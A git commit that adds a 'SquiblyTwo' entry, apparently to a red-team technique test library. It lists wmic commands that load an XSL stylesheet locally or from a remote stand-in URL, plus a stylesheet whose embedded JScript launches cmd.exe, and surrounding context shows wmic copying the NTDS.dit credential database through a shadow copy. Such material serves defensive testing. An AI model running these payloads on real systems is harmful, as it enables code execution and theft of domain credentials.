SquiblyTwo

Adding SquiblyTwo
This commit is contained in:
Michael Haag
2018-05-01 15:29:42 -04:00
parent c7fcab6533
commit d508c3a71a
2 changed files with 21 additions and 0 deletions
@@ -43,3 +43,13 @@ Input:
Input:
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
### SquiblyTwo
Input:
wmic process list /FORMAT:evil.xsl
Input:
wmic os get /FORMAT:”https:///evil.xsl”
@@ -0,0 +1,11 @@
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
]]> </ms:script>
</stylesheet>